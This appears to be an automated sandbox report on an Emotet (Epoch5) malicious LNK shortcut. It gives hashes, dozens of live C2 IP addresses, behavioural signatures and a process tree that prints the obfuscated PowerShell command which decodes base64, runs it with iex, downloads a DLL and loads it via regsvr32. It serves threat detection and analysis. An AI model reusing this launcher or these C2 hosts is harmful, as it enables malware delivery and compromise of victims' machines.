Analysis
- max time kernel: 90s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 27-05-2022 08:37
- Static task: static1
- Behavioral task: behavioral1
  Sample: 44-76912499472.lnk
  Resource: win7-20220414-en
General
- Target: 44-76912499472.lnk
- Size: 3KB
- MD5: afa789a5a4197b43071da4d94067d346
- SHA1: f5ef0b10c608fb042edae39919903b4c7510d49b
- SHA256: 9e90586b5881001bffc59e5ab90808e1470b787e1095052602cece861c0648d6
- SHA512: 2e5d94eb4d8d9fefe0dae56a7384673ae4f08ae1dc3f14bd63a01ca933689d555629b6b7acacb1b40a7ed0839ba99f9ce5f5e0791bdb09cb50b6dcb198a88808
Malware Config
Extracted
- Family: emotet
- Botnet: Epoch5
- C2:
194.9.172.107:8080
66.42.57.149:443
165.22.73.229:8080
202.29.239.162:443
104.248.225.227:8080
54.38.242.185:443
103.133.214.242:8080
78.47.204.80:443
210.57.209.142:8080
103.41.204.169:8080
118.98.72.86:443
88.217.172.165:8080
87.106.97.83:7080
85.25.120.45:8080
195.77.239.39:8080
37.44.244.177:8080
36.67.23.59:443
160.16.143.191:7080
54.38.143.246:7080
159.69.237.188:443
68.183.93.250:443
54.37.228.122:443
190.90.233.66:443
37.59.209.141:8080
178.62.112.199:8080
59.148.253.194:443
196.44.98.190:8080
202.28.34.99:8080
78.46.73.125:443
51.68.141.164:8080
207.148.81.119:8080
93.104.209.107:8080
185.148.168.220:8080
103.85.95.4:8080
62.171.178.147:8080
175.126.176.79:8080
134.122.119.23:8080
202.134.4.210:7080
116.124.128.206:8080
45.71.195.104:8080
110.235.83.107:7080
103.56.149.105:8080
68.183.91.111:8080
5.56.132.177:8080
195.154.146.35:443
217.182.143.207:443
54.37.106.167:8080
85.214.67.203:8080
188.225.32.231:4143
103.42.58.120:7080
139.196.72.155:8080
Signatures
- suricata: ET MALWARE W32/Emotet CnC Beacon 3
- Blocklisted process makes network request (4 IoCs)
  Processes:
    flow  pid   process
    8     4136  powershell.exe
    14    4136  powershell.exe
    15    4136  powershell.exe
    17    4136  powershell.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description        ioc                                                                                                   process
    Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  cmd.exe
- Loads dropped DLL (2 IoCs)
  Processes:
    pid   process
    3524  regsvr32.exe
    1316  regsvr32.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid   process
    4136  powershell.exe
    4136  powershell.exe
    1316  regsvr32.exe
    1316  regsvr32.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  4136  powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes:
    description                       pid   process         target process
    PID 4664 wrote to memory of 3300  4664  cmd.exe         cmd.exe
    PID 4664 wrote to memory of 3300  4664  cmd.exe         cmd.exe
    PID 3300 wrote to memory of 4136  3300  cmd.exe         powershell.exe
    PID 3300 wrote to memory of 4136  3300  cmd.exe         powershell.exe
    PID 4136 wrote to memory of 3524  4136  powershell.exe  regsvr32.exe
    PID 4136 wrote to memory of 3524  4136  powershell.exe  regsvr32.exe
    PID 3524 wrote to memory of 1316  3524  regsvr32.exe    regsvr32.exe
    PID 3524 wrote to memory of 1316  3524  regsvr32.exe    regsvr32.exe
Processes
- [depth 1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\44-76912499472.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /v:on /c XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||p^owershell.^e^xe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='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';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='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';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\regsvr32.exe
        Command line: "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\wwmAtO\gdGDIRqlWg.qcQ
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\regsvr32.exe
          Command line: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WcouDSMTFUfJ\RNUIcFORsDL.dll"
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\wwmAtO\gdGDIRqlWg.qcQ
  Filesize: 402KB
  MD5: 3747cf33856720d326964080824a674c
  SHA1: c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da
  SHA256: 2a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48
  SHA512: 3a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec
- C:\Windows\System32\WcouDSMTFUfJ\RNUIcFORsDL.dll
  Filesize: 402KB
  MD5: 3747cf33856720d326964080824a674c
  SHA1: c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da
  SHA256: 2a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48
  SHA512: 3a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec
- memory/1316-141-0x0000000000000000-mapping.dmp
- memory/3300-130-0x0000000000000000-mapping.dmp
- memory/3524-135-0x0000000000000000-mapping.dmp
- memory/3524-138-0x0000000180000000-0x0000000180031000-memory.dmp
  Filesize: 196KB
- memory/4136-131-0x0000000000000000-mapping.dmp
- memory/4136-132-0x000001E326880000-0x000001E3268A2000-memory.dmp
  Filesize: 136KB
- memory/4136-133-0x00007FFD46420000-0x00007FFD46EE1000-memory.dmp
  Filesize: 10.8MB
- memory/4136-134-0x000001E3274E0000-0x000001E327C86000-memory.dmp
  Filesize: 7.6MB